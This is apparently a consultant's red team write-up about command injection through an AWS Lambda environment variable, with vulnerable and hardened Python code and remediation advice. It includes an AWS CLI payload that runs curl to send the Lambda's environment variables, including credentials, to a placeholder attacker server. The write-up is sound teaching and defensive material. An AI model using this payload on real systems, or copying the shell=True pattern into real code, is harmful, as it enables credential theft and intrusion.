This particular engagement was a red team exercise for a client in the FinTech space – let's call them "SecurePay." SecurePay handled millions of daily transactions, processing sensitive financial data, and their infrastructure was almost entirely serverless on AWS. My team at TheDevDude was brought in to stress-test their defenses, specifically focusing on their core payment processing pipeline. The stakes couldn't have been higher; a breach here meant not just financial loss but catastrophic reputational damage and regulatory fines.
The specific target that caught our eye was a critical AWS Lambda function, let's call it TransactionProcessorLambda. This function was the heart of their real-time transaction validation and routing system. It was written in Python, triggered by an API Gateway endpoint, and interacted heavily with DynamoDB for transaction records, S3 for audit logs, and an internal Kafka cluster for asynchronous processing. The tech stack was pretty standard for a modern serverless application: AWS Lambda, API Gateway, DynamoDB, S3, KMS, and a smattering of other services orchestrated via AWS SAM (Serverless Application Model).
The business context was crucial: this Lambda function was responsible for validating incoming payment requests, applying business logic, and then securely forwarding them to various banking partners. Any disruption or compromise of this function meant transactions would halt, or worse, could be manipulated. It was a high-throughput, low-latency component, designed for resilience and speed. The developers had focused heavily on performance and functional correctness, as is often the case, sometimes overlooking the subtle security implications of certain design choices. I remember thinking, "This reminds me of some of the early challenges we faced at Website Factory when we were trying to balance rapid deployment with robust security for our client's e-commerce platforms." The pressure to deliver features often overshadows the meticulous review of every configuration detail, especially when it comes to environment variables, which are often seen as 'just configuration'.
Our goal was to achieve remote code execution (RCE) within this critical function, demonstrating the ability to exfiltrate data, manipulate transactions, or pivot further into their AWS environment. The initial reconnaissance revealed a complex web of IAM roles and permissions, but one particular detail in the Lambda's configuration caught our attention during an enumeration phase: a seemingly benign environment variable.
The class of bug we exploited here is a classic Command Injection, but with a twist: the injection vector wasn't direct user input from an HTTP request body or query parameter. Instead, it was an environment variable. This is a subtle but incredibly dangerous vulnerability, especially in serverless environments where environment variables are a primary mechanism for configuration and often assumed to be "safe" or static.
The vulnerability arose because the TransactionProcessorLambda used an environment variable, let's call it VALIDATION_SCRIPT_PATH, to dynamically construct and execute a shell command. The intention was to allow operations teams to easily switch between different validation scripts without redeploying the Lambda code. A noble goal, but implemented insecurely. Instead of just being a path, the variable was used as a direct prefix to a command executed via Python's subprocess.run() function with shell=True. This is a critical mistake. When shell=True is used, the command string is passed directly to the shell (e.g., /bin/sh -c "your command here"), allowing for shell metacharacter injection.
Developers often miss this because:
- They assume environment variables are controlled by trusted parties (which they are, until an attacker gains the ability to modify them).
- They focus on sanitizing direct user input, overlooking indirect input sources like configuration files or environment variables.
- There's a misunderstanding of how
subprocess.run()(or similar functions in other languages like Node.js'schild_process.exec()) behaves with and withoutshell=True. The convenience ofshell=Trueoften masks its inherent dangers. - Lack of security-focused code reviews or automated static analysis tools that specifically flag dynamic command construction from environment variables.
This vulnerability maps directly to OWASP Top 10 A03:2021 - Injection and MITRE ATT&CK T1059.006 (Command and Scripting Interpreter: Python). The ability to modify Lambda environment variables, even if initially requiring a separate privilege escalation, is a common target for attackers because it offers a direct path to RCE.
Here's a comparison of the vulnerable versus a hardened configuration approach:
| Vulnerable Configuration | Hardened Configuration |
|---|---|
|
Environment Variable:
Lambda Code Snippet:
|
Environment Variables:
Lambda Code Snippet:
|
The key takeaway here is that any time you're dynamically constructing commands, whether from user input, configuration files, or environment variables, you must treat it as untrusted input and apply rigorous sanitization or, even better, use API calls that don't involve a shell, like passing arguments as a list to subprocess.run().
Let's assume the vulnerable Python Lambda code looked something like this:
# transaction_processor.py
import os
import subprocess
import json
def lambda_handler(event, context):
# Retrieve the command prefix from environment variables
# This is the critical vulnerability point
command_prefix = os.environ.get("VALIDATION_SCRIPT_PATH", "/usr/bin/python /opt/validation_logic.py")
# Assume 'event' contains transaction data that needs validation
transaction_data = json.loads(event['body'])
transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
# Construct the full command. The vulnerability is that command_prefix
# is treated as part of the shell command, not just a path.
full_command = f"{command_prefix} --transaction-id {transaction_id}"
print(f"Executing validation command: {full_command}")
try:
# DANGER: shell=True allows command injection via command_prefix
result = subprocess.run(full_command, shell=True, capture_output=True, text=True, check=True)
print(f"Validation output: {result.stdout}")
return {
'statusCode': 200,
'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
}
except subprocess.CalledProcessError as e:
print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
return {
'statusCode': 500,
'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
}
except Exception as e:
print(f"An unexpected error occurred: {e}")
return {
'statusCode': 500,
'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
}
The default VALIDATION_SCRIPT_PATH was set to /usr/bin/python /opt/validation_logic.py. The developers intended for this to be a fixed script execution. However, because shell=True was used, any shell metacharacters in the command_prefix would be interpreted by the shell.
Our initial foothold wasn't directly on the Lambda function. We had identified a misconfigured CI/CD pipeline that, through a series of chained permissions, allowed us to assume an IAM role with lambda:UpdateFunctionConfiguration permissions for the TransactionProcessorLambda. This was our golden ticket. With these permissions, we could modify the Lambda's environment variables.
Our goal was to achieve RCE. We decided to demonstrate this by exfiltrating sensitive environment variables (which often contain AWS credentials for the Lambda's execution role) to an attacker-controlled server. First, we needed to modify the VALIDATION_SCRIPT_PATH environment variable. We used the AWS CLI for this, assuming we had the necessary IAM permissions:
# Step 1: Modify the Lambda's environment variable
# The payload injects a new command using shell metacharacters (;)
# It then uses curl to send the Lambda's environment variables to our listener.
# Finally, it attempts to execute the original script to avoid immediate suspicion,
# though the curl command would likely cause a timeout or error.
ATTACKER_SERVER="http://your-attacker-ip:8000"
LAMBDA_NAME="TransactionProcessorLambda"
aws lambda update-function-configuration
--function-name ${LAMBDA_NAME}
--environment "Variables={VALIDATION_SCRIPT_PATH='/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '}"
Let's break down that payload for VALIDATION_SCRIPT_PATH:
'/usr/bin/python /opt/validation_logic.py; curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil; echo 'Injection successful' '
/usr/bin/python /opt/validation_logic.py: This is the original, legitimate part of the command.;: This is the critical shell metacharacter. It separates the legitimate command from our injected command. The shell will execute the first command, then the second.curl -X POST -d "$(env)" ${ATTACKER_SERVER}/exfil: This is our injected command.curl -X POST: Initiates an HTTP POST request.-d "$(env)": The$(env)command substitution executes theenvcommand (which lists all environment variables) and captures its output. This output is then sent as the data body of the POST request.${ATTACKER_SERVER}/exfil: Our controlled server endpoint where we're listening for exfiltrated data.
; echo 'Injection successful': Another command separator, followed by a simple echo. This helps ensure the shell command completes, even if the curl fails, and provides a small indicator in the Lambda logs if we were monitoring them. The final single quote closes the string.
After updating the environment variable, we simply needed to trigger the Lambda function. Since it was exposed via API Gateway, a simple HTTP POST request to its endpoint was sufficient:
# Step 2: Trigger the Lambda function (e.g., via API Gateway)
# This would be a normal transaction request from a client application.
API_GATEWAY_URL="https://your-api-gateway-id.execute-api.us-east-1.amazonaws.com/prod/transactions"
curl -X POST -H "Content-Type: application/json"
-d '{"transaction_id": "TXN12345", "amount": 100.00, "currency": "USD"}'
${API_GATEWAY_URL}
On our attacker-controlled server (listening on port 8000), we immediately received an incoming POST request containing all of the Lambda's environment variables, including the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN for the Lambda's execution role. These temporary credentials granted us full programmatic access to whatever resources the Lambda's role had permissions for – which, in this case, was extensive, including DynamoDB, S3, and even some internal network access.
This was a critical RCE. With these credentials, we could have:
- Read, modified, or deleted transaction data from DynamoDB.
- Accessed sensitive audit logs from S3.
- Pivoted to other AWS services or even internal networks if the role had appropriate permissions.
- Deployed further malicious code or backdoors.
The impact was immediate and severe, demonstrating a complete compromise of the core payment processing function.
Remediating this vulnerability requires a multi-layered approach, focusing on secure coding practices, least privilege, and robust configuration management. The primary fix is to eliminate the use of shell=True with dynamically constructed commands and to separate command arguments from the command itself.
| Pros | Cons |
|---|---|
|
|
Beyond this specific code fix, a comprehensive hardening blueprint would also include:
- Least Privilege IAM: Ensure the Lambda's execution role has only the absolute minimum permissions required. For instance, it shouldn't have
lambda:UpdateFunctionConfiguration. - Input Validation: Even if environment variables are "trusted," always validate and sanitize any data derived from them, especially if it influences command execution or file paths.
- Static Application Security Testing (SAST): Integrate SAST tools into the CI/CD pipeline to automatically detect patterns like
subprocess.run(..., shell=True)or dynamic command construction. - Runtime Application Self-Protection (RASP): Consider RASP solutions for critical functions to detect and block malicious command execution attempts at runtime.
- Regular Security Audits: Periodically review Lambda configurations, environment variables, and IAM policies.
Here's how the Lambda code and environment variables should be configured:
# transaction_processor_hardened.py
import os
import subprocess
import json
import shlex # For safe splitting of shell-like strings
def lambda_handler(event, context):
# Retrieve the script path and arguments separately
# No longer a single 'command_prefix' that can be injected
script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments
# Assume 'event' contains transaction data that needs validation
transaction_data = json.loads(event['body'])
transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
# Safely parse arguments using shlex.split() if they are expected to be shell-like
# For truly fixed arguments, a simple list is better.
# Here, we assume VALIDATION_ARGS might contain multiple arguments.
try:
script_args = shlex.split(script_args_str)
except ValueError as e:
print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
script_args = ["/opt/validation_logic.py"] # Fallback to a safe default
# Construct the full command as a list of arguments
# This is crucial: subprocess.run with a list does NOT invoke a shell.
command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
print(f"Executing validation command: {' '.join(command_list)}")
try:
# SAFE: shell=False (default) when passing a list of arguments
result = subprocess.run(command_list, capture_output=True, text=True, check=True)
print(f"Validation output: {result.stdout}")
return {
'statusCode': 200,
'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
}
except subprocess.CalledProcessError as e:
print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
return {
'statusCode': 500,
'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
}
except Exception as e:
print(f"An unexpected error occurred: {e}")
return {
'statusCode': 500,
'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
}
And the corresponding environment variables:
# Hardened Environment Variables
VALIDATION_SCRIPT="/usr/bin/python"
VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script
This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.
This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:
- Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
-
shell=Trueis a Red Flag: Any time you seeshell=Truein Python'ssubprocessmodule (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments. - The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
- Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
- Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.
This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.